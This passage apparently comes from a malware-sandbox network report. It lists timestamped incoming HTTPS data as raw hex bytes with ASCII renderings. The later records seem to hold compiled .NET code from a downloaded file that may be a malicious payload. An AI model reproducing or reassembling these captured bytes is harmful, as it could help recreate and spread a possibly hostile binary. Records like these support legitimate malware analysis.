2022-01-28 21:14:32 UTC	200	IN	Data Raw: 80 ff eb 35 dd df 4e 74 74 54 2d 4f 97 d6 1f fc 51 f9 3d e9 d3 66 5b f3 e4 91 d2 9d d0 99 ea 22 8b 20 b6 47 39 e1 cd 03 9f 37 96 a9 c2 5e 59 4e f9 5d 26 28 c9 db 08 bf 4f 04 e1 91 9c 3f 58 e9 02 a6 fc 89 4f 7b dc 2b 47 58 cf 8e ec 1e f5 39 3a 89 c8 2a 49 5b c1 13 d5 72 bd 42 03 7e ec 84 59 a8 6c ac e6 d8 2a 7c 90 1d c6 78 39 bf eb 24 55 6e eb 65 f2 be bc b2 fd 1d 15 71 21 5e 2e cb 65 f1 e6 d5 6e e5 21 cd 22 c2 9e c4 3a af 8c a4 33 56 1b 66 bc 32 ef 41 11 ab 03 bb 2a 66 c8 35 d0 f7 86 9c 7b 78 d3 4a e5 5f 22 93 fc d0 04 cf f0 97 f7 b0 76 1a 46 f7 e6 4f 8f f5 29 6e bc e8 b1 33 a1 45 95 b2 18 90 57 0f 9f 95 ae 5c 2c 5a 71 2e 7c af a7 7f 7b dd c7 68 ea 30 0f 39 af 8a b6 ac f0 bd 2f 62 e8 05 99 fd 1c e2 40 83 91 d5 4a f1 2f 55 ad 46 c5 71 b0 a6 0b c2 af b0 78 Data Ascii: 5NttT-OQ=f[" G97^YN]&(O?XO{+GX9:I[rB~Yl\|x9$Uneq!^.en!":3Vf2A*f5{xJ_"vFO)n3EW\,Zq.\|{h09/b@J/UFqx
2022-01-28 21:14:32 UTC	204	IN	Data Raw: b1 57 59 da 93 9d b3 65 55 0b 25 f9 d4 af d6 0a 04 ee 18 7a df 9e 5b e1 7d c7 14 0b ce 35 90 8d 11 bc ef e6 56 be c2 b1 9e 6a 2f 1f b0 cb 9f a8 91 d2 48 24 5a 82 5b 2e c9 ad da 24 1f 65 3c e1 55 ef 71 63 99 4a 7f 6f f8 f4 04 42 79 49 1e 5f b4 44 33 cb 3a 4d 6a 68 ce 4b 43 36 fd bd 97 68 d6 0b 84 7c 9f b6 1e b0 25 ee 18 df c1 e0 7c a2 f8 a3 bf 31 18 69 c9 90 3b 6f 08 40 e5 4e ca de 4d 83 75 c4 49 ba d7 d3 2a 65 fc dc c6 b7 50 20 89 e6 b5 c6 ae aa ea 0a 7c da f3 7e 52 e8 75 60 6e 1a eb 93 96 34 a4 65 8c 15 19 5c 82 15 c3 b6 39 e2 72 99 63 ba 51 4d 15 44 5f f4 54 b1 e8 f1 ae 35 91 b4 52 78 e6 03 2a 90 90 3d 12 e0 fd da 06 d1 67 9b c4 95 f4 a6 2c 38 64 5d 71 a6 4a 37 60 68 f9 ae ae 92 ed 89 2f df a3 67 dc d8 f2 25 91 7b bf 3e 35 cc aa 8e b0 17 65 c1 8d f3 f9 Data Ascii: WYeU%z[}5Vj/H$Z[.$e<UqcJoByI_D3:MjhKC6h\|%\|1i;o@NMuIeP \|~Ru`n4e\9rcQMD_T5Rx=g,8d]qJ7`h/g%{>5e
2022-01-28 21:14:32 UTC	209	IN	Data Raw: da f7 13 95 33 40 49 5b 93 c1 92 04 38 0d 28 cf 16 b9 7f 02 6c 63 fd e9 3d 3e 90 8c bf 08 31 2d b5 d0 a2 2a ed 37 9a 58 c7 f7 4c 44 ac a1 c0 40 b0 55 ff 26 59 bb 73 43 a9 d0 1c f9 89 b5 41 53 47 94 5d 85 64 d6 b9 90 80 24 23 b2 ad c3 34 36 f3 a4 43 01 a4 64 e1 ae 6a 0b 56 e3 1d 61 35 59 3f a8 a8 c6 58 5c 4f 15 25 7c 71 d5 69 1e 2d 22 40 64 96 51 35 6e f7 f6 e2 36 aa 82 3e c1 ad e2 7b 95 29 cf 33 63 25 bb d5 cc 27 51 a2 7a 45 95 c4 2f ae 02 bb 28 a4 32 b1 a1 3e 64 be 68 35 f2 c0 b9 a6 a6 25 f8 7a 1f d5 e1 7b 01 47 a6 d1 5b bb 5f 45 e1 d8 81 94 04 08 0d bc 95 c3 48 fe 91 a5 83 d7 12 7c 7c 64 04 76 c2 48 74 2a 28 77 04 62 88 7b 25 3c 03 2f cf 30 6b 76 fb 13 22 02 0e 92 8f cf e8 11 7e a0 de 31 19 b2 3f 7a 3b 11 fb 88 7f 7b 91 df 1c 0b 71 3e 57 30 9c ea 7f 2e Data Ascii: 3@I[8(lc=>1-7XLD@U&YsCASG]d$#46CdjVa5Y?X\O%\|qi-"@dQ5n6>{)3c%'QzE/(2>dh5%z{G[_EH\|\|dvHt(wb{%</0kv"~1?z;{q>W0.
2022-01-28 21:14:32 UTC	213	IN	Data Raw: b4 e8 3a 17 de 87 ea 80 db bd ce 96 73 cb 18 c7 4b 3d 39 a9 bf 0e 94 7d 70 86 01 48 4b 70 50 ba df 30 e1 9b 2e 4c 45 af 2f 47 02 3e b8 9f 9e 88 36 ee b8 ea d7 a7 fb c1 b2 6c e3 bd 47 90 ab 08 bb a5 30 48 81 4f e1 7e cb 11 99 a5 1b 65 b2 a7 4f 3f 05 71 23 b0 64 48 15 2e 8d 84 4a e9 a8 fc 58 82 5f 96 9f 8a be 10 9b 14 33 72 a7 97 d0 47 9b 84 7f 45 7f f8 04 3d a0 d7 ff 35 52 10 7b b8 d2 8a df 81 79 25 91 e8 cf a9 30 a7 3c d9 c3 18 c5 dc 23 6a b5 cd b9 92 98 14 f7 65 07 10 6b e4 17 c4 c1 3b 29 1f ec ef 9b 3d 3e 47 bc dc 7d 8a ea 36 af 07 80 43 0d 9e e8 c7 dc 35 fb b7 ce ab 71 43 54 67 82 c9 e7 27 6d b8 59 15 cb b3 cc f0 9d b6 29 47 82 c7 1e b9 eb f3 af 62 5f 3e 58 ed 94 cf c6 b2 f5 8a b7 ae b0 4d 84 8e aa 37 93 ee c0 3f f4 fe 40 77 7f b7 12 4d b5 f8 58 1f 08 Data Ascii: :sK=9}pHKpP0.LE/G>6lG0HO~eO?q#dH.JX_3rGE=5R{y%0<#jek;)=>G}6C5qCTg'mY)Gb_>XM7?@wMX
2022-01-28 21:14:32 UTC	216	IN	Data Raw: 7a a1 01 78 3e 39 4c 5f 58 e5 1c 64 68 57 f8 c3 ed dc 5b 14 79 01 db 42 7d 1e 22 41 ff 05 0d e1 92 dc 10 e4 dc 3c 8a 62 34 60 00 af 22 61 51 5a 14 bf 11 58 21 4c 2a 36 66 11 56 be a8 d2 ca fb e0 3d 53 81 5f 5e d7 8b f1 27 7b f6 a0 fb 38 00 99 e7 ec c2 aa 8b 08 4c 96 8c de 74 cf a2 a2 be d3 04 7f ef f0 2a 27 d1 3a 35 1b c7 3a 36 df 6f dc 96 52 1f 16 b3 f1 9e 70 9a 2f 03 2f a1 f8 c8 fa d0 18 b0 0d 21 5d d7 60 22 b1 b0 52 32 87 24 44 f6 c9 d6 c5 9d e6 3b fc b6 bd b5 e7 8c 11 2c b6 99 64 7a 16 3d ba 5f 14 57 a4 c9 f4 5e d5 b2 78 7a 53 3a 05 f3 f7 5e fe d6 aa 6a 5e 52 da 06 3b a3 c8 72 5d 7f 72 8a 5e 0a ed 56 58 ee 1d 3e 87 4e 50 f2 b8 b6 2c 51 e6 5d f2 d4 80 82 5c 4e b7 7f 26 e1 ea 21 27 e0 a3 8f 95 9a 21 62 6d 09 a1 ea 84 ca a6 88 0f a8 a0 5b 65 b6 85 10 24 Data Ascii: zx>9L_XdhW[yB}"A<b4`"aQZX!L6fV=S_^'{8Lt':5:6oRp//!]`"R2$D;,dz=_W^xzS:^j^R;r]r^VX>NP,Q]\N&!'!bm[e$
2022-01-28 21:14:32 UTC	232	IN	Data Raw: ae dc a5 e7 9f d8 10 d7 5a 67 89 30 d0 98 27 98 15 df 42 a6 c3 fc a1 d7 87 20 2c 70 bf 71 49 5f 95 0e f7 f9 96 b5 99 d8 4a 13 f0 70 8c 6d 9e 45 b7 5c 21 14 a5 e5 fb 1a f0 60 36 1e 01 b7 2e a2 f5 e5 56 fd af ea 57 bc ea 92 2e c4 4b 38 7a 99 b1 fc 45 d6 61 0a 95 bd 43 93 eb 50 1d 58 eb dd 25 76 5b f0 ee 31 c5 d8 af 54 82 ba ce e2 5e 4e 9f 2d 15 3c e7 b8 24 c2 ba 3f f9 f9 3b 89 05 54 2e 7b bf f2 af 92 9e c9 24 27 b6 a0 b6 bf 9c 99 7d db dc 7a 8d 43 38 ed f0 5d e9 2a 20 d1 2d f7 6c bf 56 61 da a6 f2 8a c5 43 94 e6 eb 86 33 c9 d7 9f c6 dc be 36 eb e0 a5 bd 37 8f a6 77 c7 05 87 c0 a9 83 3c 27 3c aa 08 be 0a 1a b8 29 05 1f ec 74 0d 43 3e db 08 f9 58 f6 72 70 1f 5a 1b 55 5e b1 01 8a 25 c5 ba 25 06 f7 71 f8 3c ee 2b 81 f7 49 41 73 90 09 c6 8f be bd 41 05 e0 bd c1 Data Ascii: Zg0'B ,pqI_JpmE\!`6.VW.K8zEaCPX%v[1T^N-<$?;T.{$'}zC8]* -lVaC367w<'<)tC>XrpZU^%%q<+IAsA
2022-01-28 21:14:32 UTC	248	IN	Data Raw: 52 ac 11 34 d8 26 dc 1f d3 71 3f c7 4b 39 15 67 87 b3 72 9a 01 53 4f ba bb 73 76 c8 29 a9 3e 4d a5 c6 69 53 b0 8f ac 08 2a a6 6c 3b e9 1d d5 28 9a 51 bd 25 2e 67 d2 72 59 c1 11 7b 52 a0 a3 25 97 f1 50 f9 8a ee 4b 19 21 60 65 ce 9c ab 38 06 57 2a e3 b4 b2 ca a5 a6 aa 84 0f 62 91 2d e5 39 b9 ab e0 6f c5 ff 5e 4b 2d 69 43 e0 74 fc 71 40 ac a1 ee ec 11 5e bf 6c 15 e3 1f ad 28 c8 e7 77 65 4b 02 95 16 ea fe b2 aa be 1e f1 1f 27 7a f6 35 f1 1b 34 f2 12 ca bf 14 af 43 2d 78 66 1a 37 2c 9d de 42 fd 61 f2 7f 8f a0 8a d6 8c 1f 40 8b fd ea 8b 0c f3 f5 97 da ce 43 a9 88 7b bc 9f 0a 22 63 10 4a 41 b1 0c b4 9e bc 62 54 8f bc 88 c7 86 49 b5 45 67 b6 99 df 22 8f 02 3a 01 29 0a e8 7c ee 51 c9 99 f8 26 ef 9d 0a fc 5c ce 7e 8c fd 29 95 38 92 a9 b6 53 e3 e4 2b f3 48 1d bf f9 Data Ascii: R4&q?K9grSOsv)>MiSl;(Q%.grY{R%PK!`e8Wb-9o^K-iCtq@^l(weK'z54C-xf7,Ba@C{"cJAbTIEg":)\|Q&\~)8S+H
2022-01-28 21:14:32 UTC	264	IN	Data Raw: 01 56 e1 ff 8b 64 8f 58 7b 4b 6c e3 90 cb cf 71 d1 70 55 0f fe e5 ee b0 73 06 ef 88 bc 74 86 d1 05 cb 5a 9e 4a db 6d 8a af d5 11 9c 72 ad 67 33 6f eb af 94 61 be 29 98 8d c6 71 3b ed 78 17 f4 e8 60 b6 fb f4 9e eb ae a7 91 eb 33 70 43 12 e7 6b 1a 96 f7 c4 88 11 27 75 7b c2 6d 47 e1 7f e6 20 f2 8d 22 05 7f 7b cb 8b 73 a3 64 35 d4 a7 39 ea 61 15 31 69 d3 22 6e 6c 02 4e 3e 51 fd 34 bd 6b 63 10 ca 40 e0 54 01 b5 f8 32 9b b1 60 81 85 b9 96 c7 8a 5d b4 e1 8c 23 58 cb 55 b1 d2 3e cf e1 b8 ce cf 36 db 16 f5 ba 9a ec e6 43 f0 fd 14 9d 15 da 84 3d f0 86 d1 0e ff 85 b3 3c 07 97 6f e5 69 71 38 1d 23 42 fd 55 5e b7 61 17 8b ef ca 20 a8 7e 1c fe 05 0e e3 b4 1d 0e d1 8a ee c2 12 97 f4 d6 a0 21 47 2a 0c 73 22 bd 41 81 ae 1a 35 bd c1 78 42 a9 b8 bc 91 79 89 0b e9 65 3f e0 Data Ascii: VdX{KlqpUstZJmrg3oa)q;x`3pCk'u{mG "{sd59a1i"nlN>Q4kc@T2`]#XU>6C=<oiq8#BU^a ~!G*s"A5xBye?
2022-01-28 21:14:32 UTC	280	IN	Data Raw: 77 14 a9 e7 25 a0 69 ca 26 e8 88 92 9a d1 c5 b1 1c 34 ee 02 f1 58 09 0c 94 ba ae f6 c0 8f d1 00 08 8d e0 b3 4f ea f6 ff 35 68 fc 86 d1 b3 e1 d9 81 08 1e 01 27 0d 9e 57 54 2e 4e bb 55 71 bb c6 55 f9 a3 b0 98 73 dc 68 9c 6a 95 14 2e b8 2c 78 6b 1f 80 3a a4 40 fe ab fb 1e 73 30 90 6f 81 94 e4 0d dd ac b4 36 6a 5d 2b f8 6c 70 12 8e 21 85 24 e0 7f 17 f8 1b f9 4f cb 2e d9 94 d4 de a0 c4 d7 26 90 69 5b 36 8e 75 97 e5 14 53 95 12 23 6a 05 58 95 d0 4a 3b 8b 37 89 cf 44 c0 d4 1f 73 60 f6 d6 28 55 e3 23 ab 70 62 a6 b2 85 9b 8a a1 a0 e4 f6 71 28 5f da 91 e4 f9 ff fc ae b8 17 5c 68 d8 8d 73 d9 e7 34 c1 58 f5 17 10 92 ca 0f 14 07 14 7b d7 16 90 b8 81 63 13 b7 f8 21 34 3a d4 3e 38 f7 b3 66 69 cc f0 ed 34 77 35 10 d9 cd 11 56 2f 4e 8e a6 ac a3 ba 8c 9a ab cd 9d 88 4a 76 Data Ascii: w%i&4XO5h'WT.NUqUshj.,xk:@s0o6j]+lp!$O.&i[6uS#jXJ;7Ds`(U#pbq(_\hs4X{c!4:>8fi4w5V/NJv
2022-01-28 21:14:32 UTC	296	IN	Data Raw: 92 20 c3 dd b4 d4 4e 77 36 8f e5 96 a7 5b 10 4a 97 25 7b 10 77 bb 80 29 bb 32 59 92 a6 67 8c af f2 e8 5e 96 4f 2a ab c5 d5 4b 86 14 14 fd 9b 83 08 aa 3c 92 e5 26 1e 53 90 56 d1 26 94 69 31 62 b7 26 0c 7c a6 a5 02 4d 75 a6 3c c1 28 cb a3 28 b7 38 c2 e9 bd 59 c4 1e c1 7a 10 15 43 1b ba 26 cc 8e f7 40 6f 68 81 13 98 5e e2 af 72 ce b5 4e af 0b 4c c6 96 fb 31 f5 f9 2a 4b 05 1d 29 76 7b 5c f1 5c 34 5a 85 f8 71 be f8 7d 2c 99 ce 38 a1 75 14 1b 83 99 e4 46 e8 a3 52 33 4b a2 77 d3 6a 03 6a 70 8b fe 58 95 0b bb a3 e1 77 1e 70 f6 87 45 89 8d 37 8f 94 82 a2 58 63 dc 97 7f 6d 72 0b 4d b6 4a 29 43 58 11 b1 fc 19 b6 3d 02 04 22 89 ac e9 1d 5a 70 ae bd a7 73 ee a3 b7 e0 73 c5 1a ca 3e 06 c9 ea 10 3d d7 9e 6f cf 14 f8 88 86 a8 80 51 fe 9e e4 d2 16 01 4c bc a2 9e f2 8b be Data Ascii: Nw6[J%{w)2Yg^OK<&SV&i1b&\|Mu<((8YzC&@oh^rNL1K)v{\\4Zq},8uFR3KwjjpXwpE7XcmrMJ)CX="Zpss>=oQL
2022-01-28 21:14:32 UTC	312	IN	Data Raw: 02 fd 8f 67 48 54 69 87 4d 1c 5d 72 a5 c7 8e c3 78 d5 9d 32 a2 52 3e cc 66 be 0a 31 37 1c 46 5c a0 3e df a3 62 96 5d 01 f6 5a 1f a7 33 f7 d2 dc 50 14 ba 42 91 75 89 a9 26 67 e9 8f e0 6b c7 3f f8 51 ab 8c f6 2f fb c9 7e 31 19 0f 12 6c 61 78 eb 18 37 b6 07 d3 b5 08 bb 52 d9 b5 74 3d e1 c8 3e cb da ff 5c a8 f2 5e 7f c6 97 f7 b0 92 8a 69 ea 14 51 3f e8 1b 3a 5c 37 7f 63 e7 92 e3 ea 77 ad 4f 42 00 31 28 a5 f5 e0 fa bd 75 cc 52 64 20 95 80 0d af 91 5b 9c 82 a2 45 f8 c5 ef 3d 82 c6 24 eb b0 d1 de bc 7b 44 d4 e4 da 2c b1 f9 07 5b 45 cd 36 c1 77 d9 2a 7a c1 97 97 25 30 cc b1 55 f9 6c 31 d5 24 87 1f fd e7 bb f9 39 35 d8 82 21 cc b4 f8 75 8f 18 2e 21 66 b9 e9 78 5f 3e fb 88 1f 4d c0 70 66 e6 bf ec f3 91 eb 16 68 8a 72 66 0c 6a 24 59 bf 67 50 ba 41 c5 9d 90 ea 56 65 Data Ascii: gHTiM]rx2R>f17F\>b]Z3PBu&gk?Q/~1lax7Rt=>\^iQ?:\7cwOB1(uRd [E=${D,[E6w*z%0Ul1$95!u.!fx_>Mpfhrfj$YgPAVe
2022-01-28 21:14:32 UTC	328	IN	Data Raw: 18 90 a4 b5 f2 e0 23 f8 e1 4d a4 ea f6 36 d1 e2 1b 5a a9 40 96 ec 07 e7 bc 6e 55 91 49 34 a3 5b af 66 c1 c8 c5 98 54 80 e6 aa de ad 61 08 3f 96 33 a9 16 ae 28 f4 55 6d a6 c1 fa 36 3a 9e 84 f0 11 12 67 3f b0 80 3b b0 6e f2 8f 76 a6 81 27 72 aa c3 7c c0 63 3c 1a 49 4f 8c c6 e1 c8 2e 46 4b 00 a4 af 24 60 ad c2 5a 6f 2e d8 cb ed b7 47 94 73 75 48 1b e5 48 1a 5e 3a a0 84 d8 05 9f 4b 46 88 cc d5 80 65 e5 9e 3c c4 82 7c 3a 0c ca 2e d0 ef d2 f6 21 ef 26 b4 64 a8 18 c2 a7 be bd 20 3b 52 d8 be d5 8c 2f 26 47 75 e2 8f f7 bb 96 0b 59 0f e3 f0 f5 b5 72 b4 49 e1 24 8f 84 45 3f e4 65 aa e1 a8 e4 bb da 36 8b d0 42 78 a9 96 9f 41 5b 8c ff 92 ab c7 b5 82 27 c7 46 07 c5 79 55 f7 a2 46 99 20 14 26 ca 68 9d 84 c9 d8 6a 0b d9 be 12 a3 0d 58 ca 81 98 a8 fb be b1 89 97 e0 bb fe Data Ascii: #M6Z@nUI4[fTa?3(Um6:g?;nv'r\|c<IO.FK$`Zo.GsuHH^:KFe<\|:.!&d ;R/&GuYrI$E?e6BxA['FyUF &hjX
2022-01-28 21:14:32 UTC	344	IN	Data Raw: af 5f 79 18 db c4 e2 73 d4 fa 05 06 c6 34 a0 8c 30 da 01 9f ad a7 4a 41 c0 df 64 60 21 a9 e4 86 85 42 d5 0a 3c c5 51 f2 22 0e 2d 5a 37 95 2e f9 df c9 44 3a b3 b4 00 7e 32 ed e5 9e 11 06 45 04 7e 48 30 73 c5 51 48 96 d8 ad af ae 9f da 2e 73 d3 42 57 46 ef 78 e9 1c 3d 93 51 47 1b 57 37 fb 6c 89 29 b3 50 65 9d e4 e1 f1 a0 d7 d2 67 4a f5 ce 4e b8 4b e4 4f eb 57 43 9d b6 10 ea 42 16 cc f6 5a 25 51 3e 10 a9 31 27 05 23 28 bb 55 8e 61 36 b8 54 1f 6c 3e 6c 6a f0 b5 d3 85 c7 c1 a9 b5 52 ce 64 a2 84 48 e1 89 8b 2f c4 32 07 e4 98 e7 ac df 5b 90 9f cc 48 a6 37 61 84 d9 c5 b9 e3 5d 6e 85 0c 8d 29 bb 30 8f c3 fd e3 29 4a 30 7c 21 8d 5b 2e 7f e5 09 38 3d a0 cb af 2f 07 6d ba a4 dc 75 0b 85 00 b1 a6 0e b2 2d a3 3f d6 1b cd d6 4a 7e ea 60 b7 e3 77 8d 7f 68 4d 9c 39 37 49 Data Ascii: _ys40JAd`!B<Q"-Z7.D:~2E~H0sQH.sBWFx=QGW7l)PegJNKOWCBZ%Q>1'#(Ua6Tl>ljRdH/2[H7a]n)0)J0\|![.8=/mu-?J~`whM97I
2022-01-28 21:14:32 UTC	360	IN	Data Raw: 02 44 c3 39 33 08 99 ba bb d7 1d bd e9 22 41 5a 1e c2 c5 7a eb 78 b5 35 2c 14 d1 57 7e 67 36 4a 22 19 f7 11 9b 7f 67 1c c7 70 85 77 f1 41 b4 a7 ad 11 a7 56 f2 f9 86 03 df f2 27 f0 49 03 4d 68 0d 2b 83 2b 77 6a 4f b4 2c 07 95 26 c6 59 33 66 b1 a3 4d f3 2f df fe dd e3 00 aa 48 42 d3 17 d5 7e 50 cd b8 01 75 76 b4 72 1e d5 a5 1c ab 47 76 b8 52 e0 c1 9e 18 31 6d c3 4e 77 1a 66 c5 a2 50 89 ee 59 c6 7f d2 f8 c7 1b 59 97 fb 53 ac 41 ce 4a eb 69 14 d7 c1 55 ef ac 3e c6 04 1b 74 bc b9 6c 06 dd b3 3d ca fd 5d cb ff 39 9c 41 39 d6 b9 0c 46 ec 46 40 f4 af b3 d6 b6 dc 1a 26 7c 91 7b 89 cf 9c 7c 40 79 54 93 99 a4 50 98 57 f2 08 00 5d b5 f6 43 45 d1 72 a2 25 df a3 3d ee 14 b7 8b dd 8b cd 18 b6 52 ba 18 f2 80 91 2d 48 9b 64 26 ad cd 8c 2f a1 90 e7 9f 39 3c d9 c8 80 37 a7 Data Ascii: D93"AZzx5,W~g6J"gpwAV'IMh++wjO,&Y3fM/HB~PuvrGvR1mNwfPYYSAJiU>tl=]9A9FF@&\|{\|@yTPW]CEr%=R-Hd&/9<7
2022-01-28 21:14:32 UTC	376	IN	Data Raw: f0 ed aa 96 fb 97 ef 6b 03 cb f9 d9 17 25 31 7e a4 4e f7 4d 55 12 26 f0 4c 12 cf e2 cc c8 97 09 2c 44 0a f2 5c e5 4d 45 17 9f 2b ae 0f d0 b3 bf 42 5d ed 7c d6 58 69 dd b4 3d 26 e1 a6 70 bf a8 f4 a8 69 71 a7 0d fb 62 a4 79 ad 2b e4 74 5f fb 89 5a 74 63 20 2f 21 39 34 ab fc 01 f6 9c 16 92 20 81 2d 28 41 08 b2 0c 9c fe 4a 8a 53 7b 9b d5 a3 94 9f 6e ac c6 20 b8 fd fa a4 06 be 64 29 c5 08 35 c8 b7 e6 11 02 04 91 d2 11 06 07 4c 5b 6b 94 b2 59 57 82 89 fe 2b 5e 8d ea f6 c6 d8 08 69 e9 02 5f f8 83 3b 87 6e 2f a8 aa 0b 89 21 05 ba 5d a6 fd 08 69 f6 ea 3a 42 f2 fa fb 51 9d 6f ef 0d df 65 dd 8a a0 ba f9 71 c0 93 60 f6 15 29 cb b4 17 2c e6 a1 8c 0f 78 ac 5b 30 b3 a3 8f f3 e7 92 5d 80 0f 06 27 11 d6 7b 81 33 0d 2a c0 81 f6 40 7f 3b 3c 65 01 6e 5a 3e 71 d3 98 6c 48 6b Data Ascii: k%1~NMU&L,D\ME+B]\|Xi=&piqby+t_Ztc /!94 -(AJS{n d)5L[kYW+^i_;n/!]i:BQoeq`),x[0]'{3*@;<enZ>qlHk
2022-01-28 21:14:32 UTC	392	IN	Data Raw: 43 13 96 7b b1 a7 26 6a 22 e6 e6 20 de 8c 92 a3 cb bc 49 ac 23 bf c7 08 eb c8 f1 59 0e a9 d3 52 f1 59 bd 8c 5d 81 c4 c3 ec 45 16 a1 5c 14 a5 0c e1 42 65 c9 6f 33 d6 12 98 d9 29 0f 57 b7 99 eb 34 6b 5f 86 bd ea 52 7e 27 9f 7d fe b9 46 6b 6e 69 d6 34 12 41 11 1e 7c e3 37 5f 29 f0 10 f9 bc d4 f6 f2 3e c8 d5 89 9e 69 eb 4e 16 99 6b 90 05 cb 04 05 c9 49 fa fc 29 31 16 5e 92 b1 60 ab 6e 79 a9 86 19 cf 13 3d 25 62 00 ff d8 3d 22 82 e0 d4 7b ad f7 33 a4 df f5 d5 71 34 ee 6e 6c 09 da 77 41 69 c9 d2 79 46 47 f2 6b e6 ec 63 3d 15 ac d8 66 68 80 bf 29 51 89 16 7f eb 41 0a bd d4 62 af 17 a2 71 0e 54 99 e8 ee f2 a3 47 32 c0 d9 12 7e 9d 65 24 f8 0f 92 e4 f9 89 4b 6d e0 d2 b7 da 91 2e 6d 20 c7 f9 bd 2a 17 17 d0 85 80 4d ee 1d 1e 85 30 7f 8b 93 47 1e 3d ac 34 e5 2b cb 1e Data Ascii: C{&j" I#YRY]E\Beo3)W4k_R~'}Fkni4A\|7_)>iNkI)1^`ny=%b="{3q4nlwAiyFGkc=fh)QAbqTG2~e$Km.m *M0G=4+
2022-01-28 21:14:32 UTC	408	IN	Data Raw: 57 d0 25 0a 00 02 6a 6f 0b 1f 0a 00 00 5f 28 01 00 00 56 d0 25 0a 00 02 6a 6f 16 0a 00 00 5f 28 01 00 00 ae d0 25 0a 00 02 6a 6f 18 1f 0a 00 00 5f 28 01 00 00 12 d0 25 0a 00 02 6a 6f 0e 1f 0a 00 00 5f 28 01 00 00 6d d0 25 0a 00 02 69 73 00 00 00 00 00 00 01 2f 00 24 30 03 00 00 00 2a 0f 1f 2a 1c 2a 14 1f 03 2c 06 00 06 31 28 02 2a 1d 02 2c 0a 00 00 b4 6f 04 00 02 b3 7e 02 1c 2c 0a 00 00 65 6f 02 2a 16 1f f4 2b 26 03 2b 08 2c 0a 00 00 54 6f 26 0a 2d 1d 1e 02 2a 00 2b 26 03 2b 26 03 2c 16 1a 06 f2 2b 26 03 2b 11 2c 0a 00 02 68 6f 00 12 26 0c 2d 1a 15 02 04 00 02 b7 7e 11 00 00 02 00 00 00 61 00 09 30 13 00 00 00 2a 06 96 30 16 0a 00 02 67 6f 03 0a 0a 00 02 66 6f 06 07 2b 0a 0a 00 01 5d 6f 06 10 2b 0a 0a 00 02 65 6f 04 00 02 6d 7b 07 06 1f 2b 0a 0a 00 02 64 Data Ascii: W%jo_(V%jo_(%jo_(%jo_(m%is/$0**,1(,o~,eo+&+,To&-+&+&,+&+,ho&-~a0*0gofo+]o+eom{+d
2022-01-28 21:14:32 UTC	424	IN	Data Raw: 45 7b 02 11 00 00 ee 00 00 00 ab 00 0a 30 13 00 00 2a 58 07 06 0a 06 00 04 ff 28 05 04 03 02 06 00 05 00 28 05 02 2a 58 07 08 06 00 00 22 6f 04 fe 05 08 58 07 08 09 03 04 11 04 00 02 41 7b 02 16 2c 08 0c 0a 00 01 8e 6f 05 04 03 04 00 02 3d 7b 02 2a 08 26 0a 00 01 90 6f 17 6a 59 07 08 04 00 02 3d 7b 02 13 2c 06 00 00 23 6f 02 12 58 07 05 09 03 04 11 04 00 02 41 7b 02 04 13 59 07 69 0a 00 01 8b 6f 04 00 02 3d 7b 02 2a 58 07 0a 00 01 8e 6f 05 04 03 04 00 02 3d 7b 02 11 2d 04 00 02 41 7b 02 7e 32 06 00 03 97 6f 04 00 02 3f 7b 02 05 06 00 04 f4 28 02 04 00 02 44 7d 05 11 04 00 02 45 7d 05 13 25 16 02 02 f1 2b 00 03 0b fe 06 2b 00 02 0b fe 58 06 04 26 0a 2d 18 59 06 05 f7 2b 0b 03 2b 1b 31 16 06 26 07 2d 17 06 2a 06 f4 2b 0a ea 2b 0d 06 2b 0a 33 05 06 26 0a 2d Data Ascii: E{0X((X"oXA{,o={&ojY={,#oXA{Yio={Xo={-A{~2o?{(D}E}%++X&-Y++1&-*+++3&-
2022-01-28 21:14:32 UTC	440	IN	Data Raw: 2d 1b 0a 00 02 04 6f 00 00 00 80 20 04 02 26 26 29 2d 1c 0a 00 02 03 6f 04 02 26 26 2e 2d 15 03 02 7a 0a 00 01 8f 73 06 2d 06 00 03 04 6f 03 7a 0a 00 00 25 73 06 2d 04 7a 0a 00 00 25 73 06 2d 03 0a 00 00 24 28 02 11 00 00 02 00 00 00 af 00 0b 30 13 00 2a ee 2b 26 eb 2b 26 06 2b 06 00 04 33 28 0a 00 02 02 73 26 10 2d 1b 18 03 26 13 2d 1b 18 02 00 00 00 00 00 00 00 1f 00 0a 30 03 00 00 00 2a 00 2b 04 00 01 fc 7d 07 2b 26 26 04 2d 1a 03 02 00 00 00 00 00 00 00 11 00 09 30 03 00 00 00 2a f6 2b 26 03 2b 04 00 01 fc 7b 26 08 2d 19 1b 02 00 00 00 00 00 00 00 11 00 0a 30 03 00 00 00 2a 00 2b 04 00 01 fb 7d 07 2b 26 26 04 2d 15 03 02 00 00 00 00 00 00 00 11 00 09 30 03 00 00 00 2a f6 2b 26 03 2b 04 00 01 fb 7b 26 08 2d 17 15 02 00 00 00 00 00 00 00 11 00 0a 30 03 Data Ascii: -o &&)-o&&.-zs-oz%s-z%s-$(0+&+&+3(s&-&-0+}+&&-0+&+{&-0+}+&&-0*+&+{&-0
2022-01-28 21:14:32 UTC	456	IN	Data Raw: 01 9a 7b 02 04 00 01 9a 7b 02 06 f0 2b 0a 03 2b 21 31 17 69 8e 04 00 01 9a 7b 02 26 0e 2d 1a 61 94 16 04 00 01 9a 7b 02 06 f2 2b 0a 03 2b 3f 2c 8e 04 00 01 9a 7b 02 26 0c 2d 19 69 8e 04 00 01 9a 7b 02 11 00 00 02 00 00 00 56 00 05 30 13 00 00 2a 16 2a 06 00 03 45 28 06 02 08 33 04 00 01 9b 7b 06 04 00 01 9b 7b 02 2a 16 f8 2b 0a 03 2b 07 2d 06 26 06 2d 1b 02 00 00 71 75 03 2a 17 02 33 02 03 11 00 00 ac 00 00 00 32 00 04 30 13 00 00 00 2a 15 2a 17 2a 16 2a 5a 06 00 03 41 28 04 00 01 9a 7b 03 16 04 00 01 9a 7b 02 16 04 00 01 9b 7b 02 1b 2c 04 00 01 9b 7b 02 ee 2b 26 03 2b 2a 30 04 00 01 9b 7b 03 04 00 01 9b 7b 26 10 2d 15 19 02 f1 2b 26 e9 2b 26 06 2b 47 32 04 00 01 9b 7b 26 0d 2d 18 19 03 04 00 01 9b 7b 26 15 2c 16 15 02 00 00 00 00 00 00 00 61 00 07 30 03 Data Ascii: {{++!1i{&-a{++?,{&-i{V0*E(3{{++-&-qu320**ZA({{{,{+&+0{{&-+&+&+G2{&-{&,a0
